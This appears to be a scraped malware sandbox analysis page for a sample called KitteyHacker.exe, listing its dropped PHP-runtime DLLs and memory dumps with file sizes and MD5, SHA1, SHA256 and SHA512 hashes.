C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\php5ts.dll

Filesize
6.5MB

MD5
c9aff68f6673fae7580527e8c76805b6

SHA1
bb62cc1db82cfe07a8c08a36446569dfc9c76d10

SHA256
9b2c8b8c4cec301c4303f58ca4e8b261d516f10feb24573b092dfccc263baea4

SHA512
c7836f46e535046562046fdd8d3264cd712a78c0f41eab152c88ea91b17d34f000e2387ded7e9e7b3410332354aabf8ca7d37729eb68e46ab5ce58936e63ac56

Download Submit
C:\Users\Admin\AppData\Local\Temp\B0A9.tmp\squall.dll

Filesize
544KB

MD5
0c7ab1951a9aa0ffd1107327020f0fce

SHA1
5192f8dae5541dd54e8de3851b28d2a04d54af57

SHA256
273fcce130ccf8f14201049590721b5c12ac95f696dce9c83e9fee3914c9434e

SHA512
0e5c7cfc965b8545b43b36d24eda90e2118d359992dbf4c1ad80199e93d436841aed14e2b59eb53c1c8b3d02d38ae9b557e1abca6215823f18d90c976ad8b8b4

Download Submit
C:\Users\Admin\Downloads\KitteyHacker.exe

Filesize
29.2MB

MD5
e1e384b5ec6d898e813dfb671f6d4489

SHA1
0ae4051554555faff2f330d6487d17a939027e94

SHA256
d5618bfa36e823c688ce8aae3b0462b51dd96b076291991da755768f0c177b05

SHA512
be3ffbb728f119d9159d0527d18e9889a406e9c48aca04ea72c5dbac0bcfd12157de3c0d365be56006fca99bb10a1fcf2629272bd6d9d7ebaa5291edd184619e

Download Submit
C:\Users\Admin\Downloads\KitteyHacker.exe.vtt8oz3.partial

Filesize
29.2MB

MD5
e1e384b5ec6d898e813dfb671f6d4489

SHA1
0ae4051554555faff2f330d6487d17a939027e94

SHA256
d5618bfa36e823c688ce8aae3b0462b51dd96b076291991da755768f0c177b05

SHA512
be3ffbb728f119d9159d0527d18e9889a406e9c48aca04ea72c5dbac0bcfd12157de3c0d365be56006fca99bb10a1fcf2629272bd6d9d7ebaa5291edd184619e

Download Submit
\Users\Admin\AppData\Local\Temp\B0A9.tmp\ext\php_squall.dll

Filesize
126KB

MD5
6ff84bc8812b8c079fa6de68cf36ab59

SHA1
ca8789bbd7b0193221f9518e6b2f5b319c32b717

SHA256
7587e29919a56b6f94675e49208e1ae908bcab09363734d846502c3b4ad54326

SHA512
5ef9d9c1038b055186147cbfcfbedf54d6ecc235468ef4968630eb03368cf2c3f39dd600f1ebf9ecfe9b7cc134235b01a983a4fe9b6f292775244f837ec2e81f

Download Submit
\Users\Admin\AppData\Local\Temp\B0A9.tmp\php5ts.dll

Filesize
6.5MB

MD5
c9aff68f6673fae7580527e8c76805b6

SHA1
bb62cc1db82cfe07a8c08a36446569dfc9c76d10

SHA256
9b2c8b8c4cec301c4303f58ca4e8b261d516f10feb24573b092dfccc263baea4

SHA512
c7836f46e535046562046fdd8d3264cd712a78c0f41eab152c88ea91b17d34f000e2387ded7e9e7b3410332354aabf8ca7d37729eb68e46ab5ce58936e63ac56

Download Submit
\Users\Admin\AppData\Local\Temp\B0A9.tmp\squall.dll

Filesize
544KB

MD5
0c7ab1951a9aa0ffd1107327020f0fce

SHA1
5192f8dae5541dd54e8de3851b28d2a04d54af57

SHA256
273fcce130ccf8f14201049590721b5c12ac95f696dce9c83e9fee3914c9434e

SHA512
0e5c7cfc965b8545b43b36d24eda90e2118d359992dbf4c1ad80199e93d436841aed14e2b59eb53c1c8b3d02d38ae9b557e1abca6215823f18d90c976ad8b8b4

Download Submit
memory/2976-86-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2976-91-0x0000000000280000-0x00000000002AA000-memory.dmp

Filesize
168KB

Download
memory/2976-93-0x0000000000350000-0x00000000003E9000-memory.dmp

Filesize
612KB

Download
memory/2976-95-0x0000000008D20000-0x0000000008D21000-memory.dmp

Filesize
4KB

Download
memory/2976-100-0x0000000000230000-0x0000000000231000-memory.dmp

Filesize
4KB

Download
memory/2976-101-0x0000000008D20000-0x0000000008D21000-memory.dmp

Filesize
4KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads